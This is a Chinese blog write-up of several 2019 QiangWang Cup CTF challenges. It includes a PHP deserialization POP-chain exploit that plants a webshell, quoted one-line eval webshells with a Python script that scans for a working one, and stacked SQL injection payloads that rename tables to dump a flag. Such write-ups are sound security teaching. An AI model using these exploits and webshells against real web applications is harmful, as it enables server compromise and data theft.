
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>强网杯部分wp | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言强网杯与物理实验撞了还是很难受的..没发现upload源码泄露更难受，下面是对其他题目的一些复盘 Upload主要后台逻辑文件共有Register.php,login.php,Profile.php.Index.php这四个文件 先理清一下文件的代码逻辑 register的函数逻辑  首先调用__construct进行new Index(),从Index中调用login_check进行登陆检测">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯部分wp">
<meta property="og:url" content="http://yoursite.com/2019/06/04/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86wp/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="前言强网杯与物理实验撞了还是很难受的..没发现upload源码泄露更难受，下面是对其他题目的一些复盘 Upload主要后台逻辑文件共有Register.php,login.php,Profile.php.Index.php这四个文件 先理清一下文件的代码逻辑 register的函数逻辑  首先调用__construct进行new Index(),从Index中调用login_check进行登陆检测">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbaxb9o7j31350hwtaz.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbdsms7hj30u40ajdge.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbkopahoj30rm0fbt9p.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbgnza1jj30gt075mx5.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbin6dtvj30ju0cyweq.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbwpsd9kj30wx0ke765.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kd2tuaeyj30t60dsdh6.jpg">
<meta property="og:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3oyb990kxj30qm0di0y2.jpg">
<meta property="article:published_time" content="2019-06-04T01:18:00.000Z">
<meta property="article:modified_time" content="2019-06-04T03:15:58.000Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbaxb9o7j31350hwtaz.jpg">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">心未死 战未败</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-强网杯部分wp" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/06/04/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86wp/" class="article-date">
  <time datetime="2019-06-04T01:18:00.000Z" itemprop="datePublished">2019-06-04</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      强网杯部分wp
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>强网杯与物理实验撞了还是很难受的..没发现upload源码泄露更难受，下面是对其他题目的一些复盘</p>
<h3 id="Upload"><a href="#Upload" class="headerlink" title="Upload"></a>Upload</h3><p>主要后台逻辑文件共有<code>Register.php,login.php,Profile.php.Index.php</code>这四个文件</p>
<p>先理清一下文件的代码逻辑</p>
<p>register的函数逻辑</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbaxb9o7j31350hwtaz.jpg" alt="img"></p>
<p>首先调用__construct进行new Index(),从Index中调用login_check进行登陆检测，login_check函数代码如下：</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbdsms7hj30u40ajdge.jpg" alt="img"></p>
<p>可以看到函数逻辑为将目前<strong>User处的反序列化数据与数据库中的进行对比，如果不同则直接返回0</strong>，这里就是我们要利用的一个点——–<strong>unserialize</strong></p>
<p>接着去找一下所有文件中危险魔术方法操作</p>
<p><strong>register处的__construct</strong></p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbkopahoj30rm0fbt9p.jpg" alt="img"></p>
<p><strong>register处destruct</strong></p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbgnza1jj30gt075mx5.jpg" alt="img"></p>
<p><strong>Profile中的<strong>call与</strong>get方法</strong></p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbin6dtvj30ju0cyweq.jpg" alt="img"></p>
<p><strong>这四个魔术方法足以形成一个pop链，去调用任意函数方法</strong>，解析如下:</p>
<p><strong>当<strong>destruct中的$this-&gt;checker指向的index方法如果在$this-&gt;checker这个类不存在的话，那么就会触发</strong>call方法，在<strong>call方法中逻辑:调用$this-&gt;{$name}，但是如果此类中仍然不存在$this-&gt;${name}变量的话,那么就会再一次触发</strong>get魔术方法，去返回expect数组中对应调用此$this-&gt;name的值，然后__call再次去调用expect数组中对应的值，所以只要我们构造好expect数组中index对应值，就可以实现执行任意方法的操作，将值写成方法的名字，便可调用任意方法。</strong></p>
<p>这里还要说明一点:为什么这个反序列化数据看起来的作用域是所有类的，看到所有类中是基本都有一个<strong>login_check</strong>函数的，所以反序列化的数据对应的作用域即是所有类，所以可以进行构造反序列化自由调用。</p>
<h4 id="既然可以执行任意方法函数了，下面来找一下危险函数方法"><a href="#既然可以执行任意方法函数了，下面来找一下危险函数方法" class="headerlink" title="既然可以执行任意方法函数了，下面来找一下危险函数方法"></a>既然可以执行任意方法函数了，下面来找一下危险函数方法</h4><p>在Profile类中存在<strong>upload-img危险函数</strong></p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kbwpsd9kj30wx0ke765.jpg" alt="img"></p>
<p>可以看到有一个<strong>危险操作copy函数，如果我们控制了filename与filename_tmp就可以成功生成自己的webshell了</strong></p>
<p>这里在upload_img函数中有几个点需要去绕过一下：</p>
<ul>
<li>login_check函数：在反序列化时通过this-&gt;checker实例化Index类进行login_check调用检查，这里比较好绕过，<strong>可以不用管$this-&gt;checker(因为反序列化不会去调用__construct方法，还可以将$this&gt;checker赋值为0或者false,都可以实现绕过。</strong></li>
<li>第二个if，反序列化的时候不上传文件即可绕过。</li>
<li>第三个，就是之前所说的文件头伪造绕过的</li>
<li>赋值<strong>$this-&gt;ext为1</strong>,进入copy函数生成图片马</li>
</ul>
<p>下面为逻辑图</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kd2tuaeyj30t60dsdh6.jpg" alt="img"></p>
<p>这样我们就可以很轻松的写出反序列化构造代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace app\web\controller;</span><br><span class="line">class Register</span><br><span class="line">&#123;</span><br><span class="line">    public $registed&#x3D;0;</span><br><span class="line">    public $checker;</span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;checker&#x3D;new Profile();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Profile</span><br><span class="line">&#123;</span><br><span class="line">    public $except&#x3D;array(&#39;index&#39;&#x3D;&gt;&#39;upload_img&#39;);</span><br><span class="line">    public $filename_tmp&#x3D;&#39;..&#x2F;public&#x2F;upload&#x2F;bc9c0f21801e3928b868149bfb65e408&#x2F;cd3d1cc6e477b590d1b89a6ee805808e.png&#39;;</span><br><span class="line">    public $filename&#x3D;&#39;..&#x2F;public&#x2F;upload&#x2F;lihuaiqiu.php&#39;;</span><br><span class="line">    public $ext&#x3D;1;</span><br><span class="line">&#125;</span><br><span class="line">$v&#x3D;new Register();</span><br><span class="line">echo base64_encode(serialize($v));</span><br></pre></td></tr></table></figure>

<p>将生成的base64编码放进cookie中，得到webshell</p>
<p><a href="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kdbu25hrj31590fnabf.jpg" target="_blank" rel="noopener">https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3kdbu25hrj31590fnabf.jpg</a></p>
<h3 id="高明的黑客"><a href="#高明的黑客" class="headerlink" title="高明的黑客"></a>高明的黑客</h3><p>开始还以为是源码混淆Orz，其实是一个webshell检测。</p>
<p>下载下来先看一看各个文件的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$_GET[<span class="string">'koCDtumdL'</span>] = <span class="string">' '</span>;</span><br><span class="line"><span class="keyword">echo</span> `&#123;$_GET[<span class="string">'koCDtumdL'</span>]&#125;`;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$_GET[<span class="string">'I29lh7cQy'</span>] = <span class="string">' '</span>;</span><br><span class="line">$XnG = <span class="string">'HuyJp9'</span>;</span><br><span class="line">$VMu0e9 = <span class="string">'IcO5xu3U'</span>;</span><br><span class="line">$Hoe5A = <span class="string">'PJG62i'</span>;</span><br><span class="line">$ubz = <span class="keyword">new</span> stdClass();</span><br><span class="line">$ubz-&gt;aJ8 = <span class="string">'gGUGkqZC'</span>;</span><br><span class="line">$ubz-&gt;tv79bhFX = <span class="string">'Nqnz9sBp75'</span>;</span><br><span class="line">$ubz-&gt;qm5PiB = <span class="string">'N9D'</span>;</span><br><span class="line">$CEOXM1OK = <span class="string">'JxK'</span>;</span><br><span class="line">$je3_P4w = <span class="string">'xdWIprx5TX'</span>;</span><br><span class="line">$VMu0e9 = $_GET[<span class="string">'xUX5t3zfVyCTro'</span>] ?? <span class="string">' '</span>;</span><br><span class="line"><span class="keyword">if</span>(function_exists(<span class="string">"n0w_vOdIh5wEQhC"</span>))&#123;</span><br><span class="line">    n0w_vOdIh5wEQhC($Hoe5A);</span><br><span class="line">&#125;</span><br><span class="line">var_dump($je3_P4w);</span><br><span class="line"><span class="keyword">eval</span>($_GET[<span class="string">'I29lh7cQy'</span>] ?? <span class="string">' '</span>);</span><br></pre></td></tr></table></figure>

<p>可以看到大部分文件中，虽然有一句话木马，但是都是一些障眼法，在一句话木马的上方，是有代码将传入的值置空的。</p>
<p>本地搭建进行代码爆破</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">partern=re.compile(<span class="string">r'(_GET\[\')(.*)(\'\])'</span>)</span><br><span class="line">url=<span class="string">'http://127.0.0.1/src'</span></span><br><span class="line">command=<span class="string">"echo 'lihuaiqiu'"</span></span><br><span class="line">filename=os.listdir(<span class="string">"F:\\phpstudy\\WWW\\src"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> filename:</span><br><span class="line">    true_url=url+i</span><br><span class="line">    d=open(<span class="string">"F:\\phpstudy\\WWW\\src\\"</span>+i)</span><br><span class="line">    c=d.read()</span><br><span class="line">    params=partern.findall(c)</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> params:</span><br><span class="line">        url2=true_url+<span class="string">'?'</span>+j[<span class="number">1</span>]+<span class="string">'='</span>+command</span><br><span class="line">        r=requests.get(url2)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"lihuaiqiu"</span> <span class="keyword">in</span> r.content:</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"Webshell"</span></span><br><span class="line">            <span class="keyword">print</span> url2</span><br><span class="line">            exit()</span><br></pre></td></tr></table></figure>

<h3 id="随便注"><a href="#随便注" class="headerlink" title="随便注"></a>随便注</h3><p>这道题成功触及了我的知识盲区….来学习一波</p>
<h4 id="解法1："><a href="#解法1：" class="headerlink" title="解法1："></a>解法1：</h4><p>先基本操作一下，看看表，数据库，当前表</p>
<p><code>1&#39;;show databases;</code></p>
<p>回显</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(11) &quot;ctftraining&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(18) &quot;information_schema&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(5) &quot;mysql&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(18) &quot;performance_schema&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(9) &quot;supersqli&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(4) &quot;test&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>1&#39;;show tables;</code></p>
<p>回显</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(16) &quot;1919810931114514&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(5) &quot;words&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>1&#39;;describe words;</code></p>
<p>回显</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">array(6) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(2) &quot;id&quot;</span><br><span class="line">  [1]&#x3D;&gt;</span><br><span class="line">  string(7) &quot;int(10)&quot;</span><br><span class="line">  [2]&#x3D;&gt;</span><br><span class="line">  string(2) &quot;NO&quot;</span><br><span class="line">  [3]&#x3D;&gt;</span><br><span class="line">  string(0) &quot;&quot;</span><br><span class="line">  [4]&#x3D;&gt;</span><br><span class="line">  NULL</span><br><span class="line">  [5]&#x3D;&gt;</span><br><span class="line">  string(0) &quot;&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">array(6) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(4) &quot;data&quot;</span><br><span class="line">  [1]&#x3D;&gt;</span><br><span class="line">  string(11) &quot;varchar(20)&quot;</span><br><span class="line">  [2]&#x3D;&gt;</span><br><span class="line">  string(2) &quot;NO&quot;</span><br><span class="line">  [3]&#x3D;&gt;</span><br><span class="line">  string(0) &quot;&quot;</span><br><span class="line">  [4]&#x3D;&gt;</span><br><span class="line">  NULL</span><br><span class="line">  [5]&#x3D;&gt;</span><br><span class="line">  string(0) &quot;&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以下过程省略…最后可以得到结果，我们处于<code>table words</code>中，而flag在<code>table 1919810931114514</code>中</p>
<p>也就是说我们需要在没有select的情况下进行跨表查询，下面就是学到师傅的姿势——<code>将flag表名改为当前表名words，再利用&#39;or &#39;1&#39;=&#39;1去获取flag表中所有内容。</code>但是这里需要注意的是words表比flag表多了一个id字段，所以我们要通过alert在flag表中添加一个id字段，最终payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39;;alert table &#39;1919810931114514&#39; add(id int NULL);rename table &#96;words&#96; to &#96;tmptable&#96;;rename table &#96;1919810931114514&#96;to words;</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">array(2) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(38) &quot;flag&#123;3fy145hzdo5ryeho9za94r0qnbkvha0g&#125;&quot;</span><br><span class="line">  [1]&#x3D;&gt;</span><br><span class="line">  NULL</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="解法2"><a href="#解法2" class="headerlink" title="解法2:"></a>解法2:</h4><p>堆叠注入(预处理)</p>
<p>查询字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;;use information_schema;set @sql&#x3D;concat(&#39;s&#39;,&#39;elect column_name from columns wher&#39;,&#39;e table_name&#x3D;&quot;1919810931114514&quot;&#39;);PREPARE stmt1 FROM @sql;EXECUTE stmt1;</span><br></pre></td></tr></table></figure>

<p>爆字段内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;;use supersqli;set @sql&#x3D;concat(&#39;s&#39;,&#39;elect &#96;flag&#96; from &#96;1919810931114514&#96;&#39;);PREPARE stmt1 FROM @sql;EXECUTE stmt1;</span><br></pre></td></tr></table></figure>

<p>大写PREPARE关键字绕过strstr，得到flag。</p>
<h3 id="强网先锋-上单"><a href="#强网先锋-上单" class="headerlink" title="强网先锋-上单"></a>强网先锋-上单</h3><p>挺沙雕的一道题….tp5框架的RCE，打就行了</p>
<h3 id="强网先锋-辅助"><a href="#强网先锋-辅助" class="headerlink" title="强网先锋-辅助"></a>强网先锋-辅助</h3><p>老套路了….公因数求q，然后得p,rsa一把梭</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> libnum</span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">n1=</span><br><span class="line">n2=</span><br><span class="line">e=<span class="number">65537</span></span><br><span class="line">q=gcd(n1,n2)</span><br><span class="line">p1=n1/q</span><br><span class="line">fn1=(q<span class="number">-1</span>)*(p1<span class="number">-1</span>)</span><br><span class="line">d=gmpy2.invert(e,fn1)</span><br><span class="line">m=pow(c,d,n1)</span><br><span class="line"><span class="keyword">print</span> libnum.n2s(m)</span><br></pre></td></tr></table></figure>

<h3 id="强网先锋-打野"><a href="#强网先锋-打野" class="headerlink" title="强网先锋-打野"></a>强网先锋-打野</h3><p>zsteg真香(学到了)</p>
<p><img src="https://cdn.sinaimg.cn.52ecy.cn/large/005BYqpgly1g3oyb990kxj30qm0di0y2.jpg" alt=""></p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/06/04/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86wp/" data-id="ckabsu399003vkkvr9iqq0frn" class="article-share-link" data-share="baidu" data-title="强网杯部分wp">Share</a>
      

      
        <a href="http://yoursite.com/2019/06/04/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86wp/#ds-thread" class="article-comment-link">Comments</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/06/07/2016-0CTF-piapiapia-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%80%83%E9%80%B8%E5%AD%97%E7%AC%A6/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          2016-0CTF-piapiapia(反序列化逃逸字符)
        
      </div>
    </a>
  
  
    <a href="/2019/06/03/RCTF-nextphp/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">RCTF-nextphp</div>
    </a>
  
</nav>

  
</article>


  <section id="comments">
    <div id="ds-thread" class="ds-thread" data-thread-key="2019/06/04/强网杯部分wp/" data-title="强网杯部分wp" data-url="http://yoursite.com/2019/06/04/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86wp/"></div>
  </section>
</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">30</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">7</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">26</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" rel="tag">生活随笔</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 12.5px;">Crypto</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 17.5px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">生活随笔</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">随笔</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a><span class="archive-list-count">21</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/05/13/Apache-Common-Collections-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">Apache Common Collections 反序列化分析学习</a>
          </li>
        
          <li>
            <a href="/2020/05/12/intigriti-Easter-XSS-challenge/">intigriti Easter XSS challenge</a>
          </li>
        
          <li>
            <a href="/2020/04/22/VolgaCTF-2020-Qualifier-Web/">VolgaCTF 2020 Qualifier-Web</a>
          </li>
        
          <li>
            <a href="/2020/04/15/DOM-Clobbering-Attack/">DOM Clobbering Attack</a>
          </li>
        
          <li>
            <a href="/2020/04/09/Javascript%E4%B8%AD%E5%8F%98%E9%87%8F%E5%A3%B0%E6%98%8E%E5%B8%A6%E6%9D%A5%E7%9A%84Tags-Broken/">Javascript中变量声明带来的Tags Broken</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="http://arvinxiang.com" target="_blank">主题作者</a>
          </li>
        
          <li>
